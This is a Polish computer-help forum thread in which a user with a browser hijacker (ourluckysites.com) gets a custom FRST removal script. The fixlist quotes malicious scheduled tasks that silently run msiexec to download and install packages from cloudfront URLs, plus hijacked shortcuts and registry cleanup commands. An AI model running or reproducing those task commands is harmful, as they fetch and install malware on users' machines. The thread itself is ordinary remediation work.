Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Nieznany groźny wirus (crash przeglądarki)

#1
Nieznany groźny wirus (crash przeglądarki)
Witam chciałbym pilnie prosić o pomoc. W ostatnim czasie gdy korzystam z przeglądarki ona samoczynnie mi się wyłącza. Od avast'a dostaje czasem jakieś komunikaty że zagrożenie zostało zablokowane itp. Po 3-4 próbie przeglądarka zaczyna znowu działać prawidłowo. Dzisiaj gdy znowu to się stało (wcześniej myślałem że to błąd ale dzieje się to za często) chciałem jeszcze raz przeskanować system avast'em ale program był "wyłączony" nie mogłem z niego korzystać ale na liście procesów wyświetlał się. Gdy udało mi się go włączyć wyskoczył komunikat że musi nastąpić ponowne uruchomienie komputera. Gdy to się stało i włączyłem przeglądarkę ustawiło mi nową stronę pod tym linkiem:
http://www.ourluckysites.com/?type=hp&am...XXW770PPL9
Naprawdę pilnie proszę o jak najszybszą pomoc Smutek
 System operacyjny: windows_ten Przeglądarka: chrome
#2
RE: Nieznany groźny wirus (crash przeglądarki)
Przedstaw komplet logów: http://forum.pcformat.pl/Problem-z-rekla...owe-logi-t .
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
#3
RE: Nieznany groźny wirus (crash przeglądarki)
Addition: http://wklej.to/aZolt

FRST: http://wklej.to/IDXp1

Shotrcut: http://wklej.to/t1J8e

AWD przed czyszczeniem: http://wklej.to/dFNCH

AWD po czyszczeniu: http://wklej.to/iZU0S

Z góry przepraszam za brak logów przy pisaniu wątku
 System operacyjny: windows_ten Przeglądarka: chrome
#4
RE: Nieznany groźny wirus (crash przeglądarki)
Cytat:Z góry przepraszam za brak logów przy pisaniu wątku
??

Do Notatnika wklej (bez frazy "Kod:"):

Kod:
Task: {92F88820-24EB-429D-9CF6-E17020BD4F70} - System32\Tasks\Plaopy => msiexec.exe /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9&amp;v=2017311 /q <==== UWAGA
Task: {C18B1C81-BFEC-4FBF-A542-EE1BE92C5B78} - System32\Tasks\Microsoft\Windows\Media Center\RegisterObject => C:\\ProgramData\\RegisterObject\\RegisterObject.exe <==== UWAGA

Task: {C278D97D-6952-4A27-BF21-03C9BF779CCC} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9&amp;d=20170428 /q <==== UWAGA
C:\\ProgramData\\RegisterObjectTask: {C278D97D-6952-4A27-BF21-03C9BF779CCC} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9&amp;d=20170428 /q <==== UWAGA
ShortcutWithArgument: C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493755813&z=d5add2897db46f228209e79gbzftbcam8w3w3b0g0g&from=che0812&uid=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9

ShortcutWithArgument: C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493755813&z=d5add2897db46f228209e79gbzftbcam8w3w3b0g0g&from=che0812&uid=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9
ShortcutWithArgument: C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493755813&z=d5add2897db46f228209e79gbzftbcam8w3w3b0g0g&from=che0812&uid=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9
ShortcutWithArgument: C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493755813&z=d5add2897db46f228209e79gbzftbcam8w3w3b0g0g&from=che0812&uid=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493755813&z=d5add2897db46f228209e79gbzftbcam8w3w3b0g0g&from=che0812&uid=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493755813&z=d5add2897db46f228209e79gbzftbcam8w3w3b0g0g&from=che0812&uid=ST1000LM014-SSHD-8GB_W770PPL9XXXXW770PPL9
HKU\S-1-5-21-1525474783-1494134789-3516168600-1001\...\MountPoints2: {3bd908f1-dfc2-11e6-8413-f0761c1a6f4d} - "H:\HiSuiteDownLoader.exe"

HKU\S-1-5-21-1525474783-1494134789-3516168600-1001\...\MountPoints2: {50bf7bb2-e615-11e6-8413-f0761c1a6f4d} - "H:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1525474783-1494134789-3516168600-1001\...\MountPoints2: {5360ec96-29b3-11e7-841f-f0761c1a6f4d} - "D:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1525474783-1494134789-3516168600-1001\...\MountPoints2: {61a36750-ac88-11e6-840a-f0761c1a6f4d} - "G:\AutoRun.exe"
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
EmptyTemp:
Skrypt unikatowy - proszę nie stosować do "takich samych" przypadków.


Plik > Zapisz jako: fixlist.txt w katalogu w którym jest FRST.exe. Uruchom FRST: Napraw > w tym samym katalogu powstanie log wynikowy: fixlog.txt. Potwierdź restart kompa.
Uwaga: narzędzie usunie wszystkie pliki tymczasowe.

Zamknij wszystkie przeglądarki, uruchom AdwCleaner > Skanuj > Oczyść > restart.
Pokaż log AdwCleaner + fixlog.txt + nowe logi FRST.
Nie pomagam na PW (ew. odpłatnie). 
I osobom z roszczeniowym podejściem. I osobom niedbającym o poprawność językową.
Jak podawać logi
Jeśli nie odpowiadam w danym wątku przez >3 dni - proszę o przypomnienie na PW z linkiem do wątku w treści.




 System operacyjny: windows_seven Przeglądarka: firefox
Programy: Polecane / Nowe / Inne




Podobne wątki (Nieznany groźny wirus (crash przeglądarki))
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Przekierowania przeglądarki na niechciane strony. Goalkeper 8 2737 07.02.2019, 12:38
Ostatni post: Goalkeper
Toungue Jak usunąć yahoo z przeglądarki. berneros 4 3442 02.07.2018, 20:20
Ostatni post: berneros
  Długie otwieranie się przeglądarki i sytemu ricardo59 8 4550 12.05.2018, 17:56
Ostatni post: ricardo59

Skocz do:


Wybrane wątki (Nieznany groźny wirus (crash przeglądarki))
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Samoistne otwieranie polecenia. kaki03 1 3793 22.12.2017 17:13
Ostatni post: Juntao
Scared Wirus, otwierające okno przeglądarki z reklamami - ozirizoos.info Neal 6 5376 20.12.2017 13:07
Ostatni post: Neal
  Czyszczenie MacBooka - proszę o porady Czarny Żniwiarz 1 3533 20.12.2017 07:59
Ostatni post: morderca
  Nieudany root - pobrałem podejrzane pliki zdenekstyby35 4 3665 15.12.2017 16:50
Ostatni post: pieterman09
  Samoistne otwieranie niechcianych stron thunder121 6 4374 12.12.2017 09:19
Ostatni post: thunder121
  Podejrzane procesy: avguirna.exe, igfxTray, hppusg, program Skladakos 3 5121 10.12.2017 14:02
Ostatni post: broda99
  Problem z instalacją/pobieraniem plików - podejrzenie infekcji OS aqu32 5 3841 05.12.2017 23:00
Ostatni post: broda99
  Wyskakujące strony internetowe Kasieru 6 4393 04.12.2017 18:43
Ostatni post: Kasieru
  usuwanie wirusów maciomen201 13 7979 02.12.2017 17:31
Ostatni post: broda99
  Usuwanie konta na forum ~Anonim 2 3546 30.11.2017 19:55
Ostatni post: broda99
  Aktywność urządzeń google - nieznane urządzenie TimeToTheGames 2 834 30.11.2017 12:42
Ostatni post: TimeToTheGames
  Nawracający wirus Juver 7 4177 28.11.2017 20:17
Ostatni post: Juver
  router a bezpieczenstwo miro.sav 3 3787 28.11.2017 16:46
Ostatni post: Michu_PL
  Trojan w przeglądarce (logi) pomocy. Krashan88 2 3847 26.11.2017 23:47
Ostatni post: Krashan88
  chrome otwierające sie reklamy w kartach kacper9765 5 3838 26.11.2017 17:56
Ostatni post: morderca